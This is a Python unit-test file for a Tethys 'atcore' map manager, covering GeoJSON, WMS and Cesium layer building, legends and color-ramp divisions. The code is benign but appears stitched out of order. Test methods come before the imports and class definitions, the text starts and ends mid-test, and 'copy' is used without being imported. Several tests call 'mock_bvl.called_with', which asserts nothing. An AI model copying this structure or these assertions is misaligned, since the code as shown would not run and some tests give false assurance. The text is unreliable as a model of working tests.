self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(True, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_layer_id(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
layer_id = uuid.uuid4()
layer_id_str = str(layer_id)
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
layer_id=layer_id
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_id_str,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_geometry_attributes(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
geometry_attribute = 'geometry'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
geometry_attribute=geometry_attribute
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_name': layer_name,
'layer_id': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
self.assertEqual(geometry_attribute, ret['geometry_attribute'])
def test_get_vector_style_map(self):
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.get_vector_style_map()
self.assertIsInstance(ret, dict)
self.assertIn('Point', ret.keys())
self.assertIn('LineString', ret.keys())
self.assertIn('Polygon', ret.keys())
def test_get_plot_for_layer_feature(self):
ret = self.map_manager.get_plot_for_layer_feature(layer_name='layer1', feature_id='F001')
self.assertEqual('F001', ret[1][0]['name'])
self.assertEqual('layer1', ret[2]['xaxis']['title'])
@mock.patch.dict('tethysext.atcore.services.map_manager.MapManagerBase.COLOR_RAMPS', values={'Default': ''}, clear=True) # noqa: E501
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.generate_custom_color_ramp_divisions')
def test_build_legend(self, mock_gccrd):
mock_gccrd.return_value = {'val1': '100', 'val2': '200', 'color1': '#fff100', 'color2': '#ff8c00'}
mock_COLOR_RAMPS = {'Default': ''}
mock_crd_kwargs = {'min_value': 100, 'max_value': 200, 'num_divisions': 2}
mock_layer = {
'layer_name': 'test:layer_name', 'layer_title': 'Test_Title', 'layer_variable': 'test:layer_variable',
'layer_id': '', 'viewparams': None, 'env': None, 'color_ramp_division_kwargs': mock_crd_kwargs
}
expected = {
'legend_id': 'test_layer_variable',
'title': 'Test Title',
'divisions': OrderedDict([(100.0, '#fff100'), (200.0, '#ff8c00')]),
'color_list': mock_COLOR_RAMPS.keys(),
'layer_id': 'test:layer_name',
'min_value': 100,
'max_value': 200,
'color_ramp': 'Default',
'prefix': 'val',
'color_prefix': 'color',
'first_division': 1,
'units': 'Ft',
}
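# The expected dict encodes two observable derivations: legend_id is
# layer_variable with ':' replaced by '_', and title is layer_title with '_'
# replaced by ' '.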
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_legend(mock_layer, units='Ft')
self.assertEqual(ret, expected)
@mock.patch.dict('tethysext.atcore.services.map_manager.MapManagerBase.COLOR_RAMPS', values={'Default': ''}, clear=True) # noqa: E501
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.generate_custom_color_ramp_divisions')
def test_build_legend_with_color_ramp(self, mock_gccrd):
mock_gccrd.return_value = {'val1': '100', 'val2': '200', 'color1': '#fff100', 'color2': '#ff8c00'}
mock_COLOR_RAMPS = {'Default': ''}
mock_crd_kwargs = {'min_value': 100, 'max_value': 200, 'num_divisions': 2, 'color_ramp': 'Default'}
mock_layer = {
'layer_name': 'test:layer_name', 'layer_title': 'Test_Title', 'layer_variable': 'test:layer_variable',
'layer_id': '', 'viewparams': None, 'env': None, 'color_ramp_division_kwargs': mock_crd_kwargs
}
expected = {
'legend_id': 'test_layer_variable',
'title': 'Test Title',
'divisions': OrderedDict([(100.0, '#fff100'), (200.0, '#ff8c00')]),
'color_list': mock_COLOR_RAMPS.keys(),
'layer_id': 'test:layer_name',
'min_value': 100,
'max_value': 200,
'color_ramp': 'Default',
'prefix': 'val',
'color_prefix': 'color',
'first_division': 1,
'units': 'Ft',
}
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_legend(mock_layer, units='Ft')
self.assertEqual(ret, expected)
import uuid
from collections import OrderedDict
from unittest import mock
import unittest
from tethys_gizmos.gizmo_options import MVLayer
from tethysext.atcore.services.model_database import ModelDatabase
from tethysext.atcore.services.model_db_spatial_manager import ModelDBSpatialManager
from tethysext.atcore.services.map_manager import MapManagerBase
class _MapManager(MapManagerBase):
def compose_map(self, request, *args, **kwargs):
return None
class MapManagerBaseTests(unittest.TestCase):
def setUp(self):
self.spatial_manager = mock.MagicMock(spec=ModelDBSpatialManager)
self.model_db = mock.MagicMock(spec=ModelDatabase)
self.map_manager = _MapManager(self.spatial_manager, self.model_db)
def tearDown(self):
pass
def test_map_extent_property(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
ret = self.map_manager.map_extent
self.map_manager.get_map_extent.assert_called()
self.assertEqual('test_extent', ret)
def test_map_extent_property_cached(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
self.map_manager._map_extent = 'bar'
ret = self.map_manager.map_extent
self.map_manager.get_map_extent.assert_not_called()
self.assertEqual('bar', ret)
def test_default_view_property(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
ret = self.map_manager.default_view
self.map_manager.get_map_extent.assert_called()
self.assertEqual('test_view', ret)
def test_default_view_property_cached(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
self.map_manager._default_view = 'foo'
ret = self.map_manager.default_view
self.map_manager.get_map_extent.assert_not_called()
self.assertEqual('foo', ret)
def test_build_layer_group(self):
ret = self.map_manager.build_layer_group(id='ID001', display_name='Foo', layers='Layer1')
self.assertEqual('Foo', ret['display_name'])
self.assertEqual('ID001', ret['id'])
self.assertEqual('checkbox', ret['control'])
self.assertEqual('Layer1', ret['layers'])
self.assertTrue(ret['visible'])
def test_build_layer_group_value_error(self):
self.assertRaises(ValueError, self.map_manager.build_layer_group,
id='ID001', display_name='Foo', layers='Layer1', layer_control='groupbox')
def test_get_wms_endpoint(self):
ret = self.map_manager.get_wms_endpoint()
self.spatial_manager.get_wms_endpoint.assert_called_with(public=True)
self.assertEqual(self.spatial_manager.get_wms_endpoint(), ret)
@mock.patch('tethysext.atcore.services.map_manager.MVView')
def test_get_map_extent(self, mock_mvv):
test_extent = [-10, -10, 10, 10]
self.spatial_manager.get_extent_for_project.return_value = test_extent
view, extent = self.map_manager.get_map_extent()
mock_mvv.assert_called_with(
projection='EPSG:4326',
center=[0.0, 0.0],
zoom=MapManagerBase.DEFAULT_ZOOM,
maxZoom=MapManagerBase.MAX_ZOOM,
minZoom=MapManagerBase.MIN_ZOOM
)
self.spatial_manager.get_extent_for_project.assert_called_with(
model_db=self.model_db
)
self.assertEqual(mock_mvv(), view)
self.assertEqual(test_extent, extent)
@mock.patch('tethysext.atcore.services.map_manager.MVView')
def test_get_map_extent_no_extent(self, mock_mvv):
self.spatial_manager.get_extent_for_project.return_value = None
view, extent = self.map_manager.get_map_extent()
mock_mvv.assert_called_with(
projection='EPSG:4326',
center=MapManagerBase.DEFAULT_CENTER,
zoom=MapManagerBase.DEFAULT_ZOOM,
maxZoom=MapManagerBase.MAX_ZOOM,
minZoom=MapManagerBase.MIN_ZOOM
)
self.spatial_manager.get_extent_for_project.assert_called_with(
model_db=self.model_db
)
self.assertEqual(mock_mvv(), view)
self.assertIsNone(extent)
def test_generate_custom_color_ramp_divisions(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
value_precision=1,
num_divisions=10
)
expected = {
'val1': '100.0', 'color1': '#fff100',
'val2': '200.0', 'color2': '#ff8c00',
'val3': '300.0', 'color3': '#e81123',
'val4': '400.0', 'color4': '#ec008c',
'val5': '500.0', 'color5': '#68217a',
'val6': '600.0', 'color6': '#00188f',
'val7': '700.0', 'color7': '#00bcf2',
'val8': '800.0', 'color8': '#00b294',
'val9': '900.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_val_no_data(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
value_precision=1,
no_data_value=0,
)
expected = {
'val1': '100.0', 'color1': '#fff100',
'val2': '200.0', 'color2': '#ff8c00',
'val3': '300.0', 'color3': '#e81123',
'val4': '400.0', 'color4': '#ec008c',
'val5': '500.0', 'color5': '#68217a',
'val6': '600.0', 'color6': '#00188f',
'val7': '700.0', 'color7': '#00bcf2',
'val8': '800.0', 'color8': '#00b294',
'val9': '900.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a',
'val_no_data': 0}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_with_colors(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
color_ramp="Blue and Red"
)
expected = {
'val1': '100.00', 'color1': '#a50026',
'val2': '200.00', 'color2': '#d73027',
'val3': '300.00', 'color3': '#f46d43',
'val4': '400.00', 'color4': '#fdae61',
'val5': '500.00', 'color5': '#fee090',
'val6': '600.00', 'color6': '#e0f3f8',
'val7': '700.00', 'color7': '#abd9e9',
'val8': '800.00', 'color8': '#74add1',
'val9': '900.00', 'color9': '#4575b4',
'val10': '1000.00', 'color10': '#313695'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_first_division(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
first_division=0
)
expected = {
'val0': '100.0', 'color0': '#fff100',
'val1': '200.0', 'color1': '#ff8c00',
'val2': '300.0', 'color2': '#e81123',
'val3': '400.0', 'color3': '#ec008c',
'val4': '500.0', 'color4': '#68217a',
'val5': '600.0', 'color5': '#00188f',
'val6': '700.0', 'color6': '#00bcf2',
'val7': '800.0', 'color7': '#00b294',
'val8': '900.0', 'color8': '#009e49',
'val9': '1000.0', 'color9': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_prefix(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
prefix='foo'
)
expected = {
'foo1': '100.0', 'color1': '#fff100',
'foo2': '200.0', 'color2': '#ff8c00',
'foo3': '300.0', 'color3': '#e81123',
'foo4': '400.0', 'color4': '#ec008c',
'foo5': '500.0', 'color5': '#68217a',
'foo6': '600.0', 'color6': '#00188f',
'foo7': '700.0', 'color7': '#00bcf2',
'foo8': '800.0', 'color8': '#00b294',
'foo9': '900.0', 'color9': '#009e49',
'foo10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_top_offset(self):
min_elevation = 10
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
top_offset=900
)
expected = {
'val1': '10.0', 'color1': '#fff100',
'val2': '20.0', 'color2': '#ff8c00',
'val3': '30.0', 'color3': '#e81123',
'val4': '40.0', 'color4': '#ec008c',
'val5': '50.0', 'color5': '#68217a',
'val6': '60.0', 'color6': '#00188f',
'val7': '70.0', 'color7': '#00bcf2',
'val8': '80.0', 'color8': '#00b294',
'val9': '90.0', 'color9': '#009e49',
'val10': '100.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_bottom_offset(self):
min_elevation = 10
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
bottom_offset=900
)
expected = {
'val1': '910.0', 'color1': '#fff100',
'val2': '920.0', 'color2': '#ff8c00',
'val3': '930.0', 'color3': '#e81123',
'val4': '940.0', 'color4': '#ec008c',
'val5': '950.0', 'color5': '#68217a',
'val6': '960.0', 'color6': '#00188f',
'val7': '970.0', 'color7': '#00bcf2',
'val8': '980.0', 'color8': '#00b294',
'val9': '990.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_build_param_string_multiple_kwargs(self):
ret = self.map_manager.build_param_string(foo='bar', baz='jar')
parts = ret.split(';')
self.assertIn('baz:jar', parts)
self.assertIn('foo:bar', parts)
def test_build_param_string_single_kwargs(self):
ret = self.map_manager.build_param_string(foo='bar')
self.assertEqual('foo:bar', ret)
def test_build_param_string_no_kwargs(self):
ret = self.map_manager.build_param_string()
self.assertEqual('', ret)
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_invalid(self, _):
model = [{'model': {'uri': 'glb_file.glb', 'show': True, 'shadows': 'enabled'},
'name': 'Funwave',
'orientation': {
'Cesium.Transforms.headingPitchRollQuaternion':
[{'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
{'Cesium.HeadingPitchRoll': [{'Cesium.Math.toRadians': -42}, 0, 0]}]},
'position': {'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
},
]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
self.assertRaises(ValueError, self.map_manager.build_cesium_layer, cesium_type='WrongType', cesium_json=model,
layer_name=layer_name, layer_title=layer_title, layer_variable=layer_variable)
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_model(self, mock_gvsm, mock_bvl):
model = [{'model': {'uri': 'glb_file.glb', 'show': True, 'shadows': 'enabled'},
'name': 'Funwave',
'orientation': {
'Cesium.Transforms.headingPitchRollQuaternion':
[{'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
{'Cesium.HeadingPitchRoll': [{'Cesium.Math.toRadians': -42}, 0, 0]}]},
'position': {'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
},
]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_cesium_layer(
cesium_type='CesiumModel',
cesium_json=model,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_source='CesiumModel',
layer_id='',
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=model,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_primitive(self, mock_gvsm, mock_bvl):
primitive = [{'Cesium.Cesium3DTileset': {'url': {'Cesium.IonResource.fromAssetId': 512295}}}]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_cesium_layer(
cesium_type='CesiumPrimitive',
cesium_json=primitive,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_source='CesiumPrimitive',
layer_id='',
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=primitive,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_geojson_layer(self, mock_gvsm, mock_bvl):
geojson = {
'type': 'FeatureCollection',
'features': [
{
'type': 'Feature',
'geometry': {'type': 'Point', 'coordinates': [-87.89832948468124, 30.651451015987234]},
'properties': {'id': 4}
},
]
}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_geojson_layer(
geojson=geojson,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
expected_options = copy.deepcopy(geojson)
expected_options['features'][0]['properties']['layer_name'] = layer_name
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='GeoJSON',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_geojson_layer_all_pass_through_args(self, mock_gvsm, mock_bvl):
geojson = {
'type': 'FeatureCollection',
'features': [
{
'type': 'Feature',
'geometry': {'type': 'Point', 'coordinates': [-87.89832948468124, 30.651451015987234]},
'properties': {'id': 4}
},
]
}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_geojson_layer(
geojson=geojson,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
layer_id='LAYER_ID_PASS_THROUGH',
extent=[1, 2, 3, 4],
visible=False,
public=False,
selectable=True,
plottable=True,
has_action=False,
popup_title='POPUP_TITLE_PASS_THROUGH',
excluded_properties=[1, 2, 3]
)
expected_options = copy.deepcopy(geojson)
expected_options['features'][0]['properties']['layer_name'] = layer_name
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_name=layer_name,
layer_source='GeoJSON',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=[1, 2, 3, 4],
layer_id='LAYER_ID_PASS_THROUGH',
visible=False,
public=False,
selectable=True,
show_download=False,
plottable=True,
has_action=False,
popup_title='POPUP_TITLE_PASS_THROUGH',
excluded_properties=[1, 2, 3],
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0'
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry',
times=None,
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_all_pass_through_args(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
visible=False,
selectable=True,
plottable=True,
has_action=False,
extent=[1, 2, 3, 4],
public=False,
geometry_attribute='GEOM_ATTR_PASS_THROUGH',
layer_id='LAYER_ID_PASS_THROUGH',
excluded_properties=[1, 2, 3],
popup_title='POPUP_TITLE_PASS_THROUGH'
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0'
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
visible=False,
selectable=True,
plottable=True,
has_action=False,
extent=[1, 2, 3, 4],
public=False,
geometry_attribute='GEOM_ATTR_PASS_THROUGH',
layer_id='LAYER_ID_PASS_THROUGH',
excluded_properties=[1, 2, 3],
popup_title='POPUP_TITLE_PASS_THROUGH',
times=None,
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_not_tiled(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
tiled=False
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous'
}
mock_bvl.assert_called_once()
mock_bvl.called_with(
layer_id='',
layer_name=layer_name,
layer_source='ImageWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_viewparams(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
viewparams = 'foo:bar;baz:jar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
viewparams=viewparams
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0',
'VIEWPARAMS': viewparams
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_env(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
env = 'foo:bar;baz:jar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
env=env
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0',
'ENV': env
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# Compare against return_value so no extra call is recorded on the mock.
self.assertEqual(ret, mock_bvl.return_value)
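# Aside: the three WMS tests above pin down the options-dict shape. A
# hypothetical helper mirroring that logic (illustrative, not the atcore API):
#
#   def build_wms_options(endpoint, layer_name, tiled=True,
#                         viewparams=None, env=None, tile_grid=None):
#       params = {'LAYERS': layer_name}
#       if tiled:
#           params.update({'TILED': True, 'TILESORIGIN': '0.0,0.0'})
#       if viewparams:
#           params['VIEWPARAMS'] = viewparams
#       if env:
#           params['ENV'] = env
#       options = {'url': endpoint, 'params': params,
#                  'serverType': 'geoserver', 'crossOrigin': 'anonymous'}
#       if tiled:
#           options['tileGrid'] = tile_grid   # e.g. DEFAULT_TILE_GRID
#       return ('TileWMS' if tiled else 'ImageWMS'), options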
def test_build_mv_layer(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_popup_title(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
popup_title = 'Baz'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
popup_title=popup_title
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
